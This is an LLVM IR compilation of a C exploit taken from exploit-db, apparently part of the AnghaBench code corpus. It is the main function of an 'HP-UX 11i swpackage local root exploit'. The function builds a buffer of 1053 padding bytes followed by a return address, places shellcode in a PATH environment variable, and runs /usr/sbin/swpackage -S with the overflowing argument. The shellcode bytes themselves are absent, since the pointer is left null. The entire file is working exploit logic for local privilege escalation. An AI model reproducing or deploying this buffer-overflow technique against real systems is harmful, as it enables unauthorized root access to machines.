; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/hp-ux/local/extr_2633.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/hp-ux/local/extr_2633.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [44 x i8] c"[ HP-UX 11i 'swpackage' local root exploit\0A\00", align 1
@.str.1 = private unnamed_addr constant [6 x i8] c"PATH=\00", align 1
@shellcode = common dso_local global i32* null, align 8
@.str.2 = private unnamed_addr constant [20 x i8] c"/usr/sbin/swpackage\00", align 1
@.str.3 = private unnamed_addr constant [10 x i8] c"swpackage\00", align 1
@.str.4 = private unnamed_addr constant [3 x i8] c"-S\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca [4 x i8], align 1
  %3 = alloca i8*, align 8
  %4 = alloca i8*, align 8
  %5 = alloca i8*, align 8
  %6 = alloca [1 x i8*], align 8
  %7 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %8 = getelementptr inbounds [4 x i8], [4 x i8]* %2, i64 0, i64 0
  %9 = bitcast i8* %8 to i64*
  store i64 2139030580, i64* %9, align 1
  %10 = call i32 @printf(i8* getelementptr inbounds ([44 x i8], [44 x i8]* @.str, i64 0, i64 0))
  %11 = call i64 @malloc(i32 2048)
  %12 = inttoptr i64 %11 to i8*
  store i8* %12, i8** %3, align 8
  %13 = load i8*, i8** %3, align 8
  store i8* %13, i8** %4, align 8
  %14 = load i8*, i8** %3, align 8
  %15 = call i32 @memset(i8* %14, i8 signext 0, i32 2048)
  %16 = load i8*, i8** %3, align 8
  %17 = call i32 @memset(i8* %16, i8 signext 97, i32 1053)
  %18 = load i8*, i8** %3, align 8
  %19 = getelementptr inbounds i8, i8* %18, i64 1053
  store i8* %19, i8** %3, align 8
  store i32 0, i32* %7, align 4
  br label %20

20:                                               ; preds = %31, %0
  %21 = load i32, i32* %7, align 4
  %22 = icmp slt i32 %21, 4
  br i1 %22, label %23, label %34

23:                                               ; preds = %20
  %24 = load i32, i32* %7, align 4
  %25 = srem i32 %24, 4
  %26 = sext i32 %25 to i64
  %27 = getelementptr inbounds [4 x i8], [4 x i8]* %2, i64 0, i64 %26
  %28 = load i8, i8* %27, align 1
  %29 = load i8*, i8** %3, align 8
  %30 = getelementptr inbounds i8, i8* %29, i32 1
  store i8* %30, i8** %3, align 8
  store i8 %28, i8* %29, align 1
  br label %31

31:                                               ; preds = %23
  %32 = load i32, i32* %7, align 4
  %33 = add nsw i32 %32, 1
  store i32 %33, i32* %7, align 4
  br label %20

34:                                               ; preds = %20
  %35 = call i64 @malloc(i32 2048)
  %36 = inttoptr i64 %35 to i8*
  store i8* %36, i8** %5, align 8
  %37 = load i8*, i8** %5, align 8
  store i8* %37, i8** %3, align 8
  %38 = load i8*, i8** %5, align 8
  %39 = call i32 @memset(i8* %38, i8 signext 0, i32 2048)
  %40 = load i8*, i8** %5, align 8
  %41 = call i32 @sprintf(i8* %40, i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.1, i64 0, i64 0))
  %42 = load i8*, i8** %3, align 8
  %43 = getelementptr inbounds i8, i8* %42, i64 5
  store i8* %43, i8** %3, align 8
  store i32 0, i32* %7, align 4
  br label %44

44:                                               ; preds = %58, %34
  %45 = load i32, i32* %7, align 4
  %46 = load i32*, i32** @shellcode, align 8
  %47 = call i32 @strlen(i32* %46)
  %48 = icmp slt i32 %45, %47
  br i1 %48, label %49, label %61

49:                                               ; preds = %44
  %50 = load i32*, i32** @shellcode, align 8
  %51 = load i32, i32* %7, align 4
  %52 = sext i32 %51 to i64
  %53 = getelementptr inbounds i32, i32* %50, i64 %52
  %54 = load i32, i32* %53, align 4
  %55 = trunc i32 %54 to i8
  %56 = load i8*, i8** %3, align 8
  %57 = getelementptr inbounds i8, i8* %56, i32 1
  store i8* %57, i8** %3, align 8
  store i8 %55, i8* %56, align 1
  br label %58

58:                                               ; preds = %49
  %59 = load i32, i32* %7, align 4
  %60 = add nsw i32 %59, 1
  store i32 %60, i32* %7, align 4
  br label %44

61:                                               ; preds = %44
  %62 = load i8*, i8** %5, align 8
  %63 = getelementptr inbounds [1 x i8*], [1 x i8*]* %6, i64 0, i64 0
  store i8* %62, i8** %63, align 8
  %64 = getelementptr inbounds [1 x i8*], [1 x i8*]* %6, i64 0, i64 1
  store i8* null, i8** %64, align 8
  %65 = load i8*, i8** %4, align 8
  %66 = getelementptr inbounds [1 x i8*], [1 x i8*]* %6, i64 0, i64 0
  %67 = call i32 @execle(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str.2, i64 0, i64 0), i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.3, i64 0, i64 0), i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.4, i64 0, i64 0), i8* %65, i32 0, i8** %66)
  %68 = load i32, i32* %1, align 4
  ret i32 %68
}

declare dso_local i32 @printf(i8*) #1

declare dso_local i64 @malloc(i32) #1

declare dso_local i32 @memset(i8*, i8 signext, i32) #1

declare dso_local i32 @sprintf(i8*, i8*) #1

declare dso_local i32 @strlen(i32*) #1

declare dso_local i32 @execle(i8*, i8*, i8*, i8*, i32, i8**) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
